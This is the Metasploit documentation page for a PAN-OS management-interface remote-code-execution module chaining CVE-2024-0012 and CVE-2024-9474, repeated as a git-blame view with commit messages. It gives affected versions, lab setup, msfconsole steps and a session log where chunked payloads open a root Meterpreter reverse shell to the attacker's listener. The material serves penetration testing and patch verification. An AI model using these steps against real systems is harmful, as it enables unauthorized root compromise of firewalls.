documentation/modules/exploit/linux/http/panos_management_unauth_rce.md

## Vulnerable Application
This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection
vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can
execute arbitrary code with root privileges.

The following versions are affected:
  * PAN-OS 11.2 (up to and including 11.2.4-h1)
  * PAN-OS 11.1 (up to and including 11.1.5-h1)
  * PAN-OS 11.0 (up to and including 11.0.6-h1)
  * PAN-OS 10.2 (up to and including 10.2.12-h2)

## Testing
Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example
`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup
by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
to change this upon logging in for the first time.

The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
and `cmd/unix/reverse_bash`.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/panos_management_unauth_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
5. `set LPORT 4444`
6. `check`
7. `exploit`

## Options

### WRITABLE_DIR
The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.

## Scenarios

### Default

```
msf exploit(linux/http/panos_management_unauth_rce) > show options

Module options (exploit/linux/http/panos_management_unauth_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.86.100   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         443              yes       The target port (TCP)
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host
   WRITABLE_DIR  /var/tmp         yes       The full path of a writable directory on the target.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      pHLZiKRnmfR      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default


View the full module info with the info, or info -d command.

msf exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf exploit(linux/http/panos_management_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.86.100
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.100
OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00			`## Vulnerable Application`
			`This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection`
			`vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can`
			`execute arbitrary code with root privileges.`

fix typo 2024-12-17 17:26:00 +00:00			`The following versions are affected:`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00			`* PAN-OS 11.2 (up to and including 11.2.4-h1)`
			`* PAN-OS 11.1 (up to and including 11.1.5-h1)`
			`* PAN-OS 11.0 (up to and including 11.0.6-h1)`
			`* PAN-OS 10.2 (up to and including 10.2.12-h2)`

			`## Testing`
			`Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example`
			`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
			`will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup`
			by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
			run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
			`to change this upon logging in for the first time.`

remove the DefaultOption PAYLOAD value, and let the framework pick one for us. Mention I tested the exploit with cmd/linux/http/x64/meterpreter_reverse_tcp 2024-11-21 16:22:02 +00:00			The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
The payload we essentially being encoded twice (thanks for calling this out Brendan), we now supply a suitable BadChars and let the framewrk encode the framework paylaod. We rename the variable payload to bootstrap_payload as this was colliding with the frameworks payload variable which was not the intent. 2024-11-21 17:37:34 +00:00			payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
			and `cmd/unix/reverse_bash`.
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00
			`## Verification Steps`

			`1. Start msfconsole`
			2. `use exploit/linux/http/panos_management_unauth_rce`
			3. `set RHOST <TARGET_IP_ADDRESS>`
			4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
			5. `set LHOST eth0`
			5. `set LPORT 4444`
			6. `check`
			7. `exploit`

As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`## Options`

			`### WRITABLE_DIR`
			The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
typo 2 2024-12-17 17:26:20 +00:00			`payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.`
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00			`## Scenarios`

			`### Default`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_management_unauth_rce) > show options`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00
			`Module options (exploit/linux/http/panos_management_unauth_rce):`

As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS 192.168.86.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html`
			`RPORT 443 yes The target port (TCP)`
			`SSL true no Negotiate SSL/TLS for outgoing connections`
			`VHOST no HTTP server virtual host`
			`WRITABLE_DIR /var/tmp yes The full path of a writable directory on the target.`


			`Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)`
			`FETCH_DELETE false yes Attempt to delete the binary after execution`
			`FETCH_FILENAME pHLZiKRnmfR no Name to use on remote system when storing payload; cannot contain spaces or slashes`
			`FETCH_SRVHOST no Local IP to use for serving payload`
			`FETCH_SRVPORT 8080 yes Local port to use for serving payload`
			`FETCH_URIPATH no Local URI to use for serving payload`
			`FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces`
			`LHOST 192.168.86.42 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00

			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Default`



			`View the full module info with the info, or info -d command.`

Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_management_unauth_rce) > check`
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`[+] 192.168.86.100:443 - The target is vulnerable.`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_management_unauth_rce) > exploit`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00
			`[*] Started reverse TCP handler on 192.168.86.42:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable.`
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`[*] Uploading payload chunk 1 of 7...`
			`[*] Uploading payload chunk 2 of 7...`
			`[*] Uploading payload chunk 3 of 7...`
			`[*] Uploading payload chunk 4 of 7...`
			`[*] Uploading payload chunk 5 of 7...`
			`[*] Uploading payload chunk 6 of 7...`
			`[*] Uploading payload chunk 7 of 7...`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00			`[*] Amalgamating payload chunks...`
			`[*] Executing payload...`
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`[*] Sending stage (3045380 bytes) to 192.168.86.100`
			`[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00
			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > sysinfo`
As the payload option FETCH_WRITABLE_DIR may not be available if a non fetch based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change. 2024-11-21 16:38:09 +00:00			`Computer : 192.168.86.100`
			`OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)`
add in exploit module for the recent PAN-OS RCE, CVE-2024-0012 + CVE-2024-9474 2024-11-19 16:15:06 +00:00			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
			```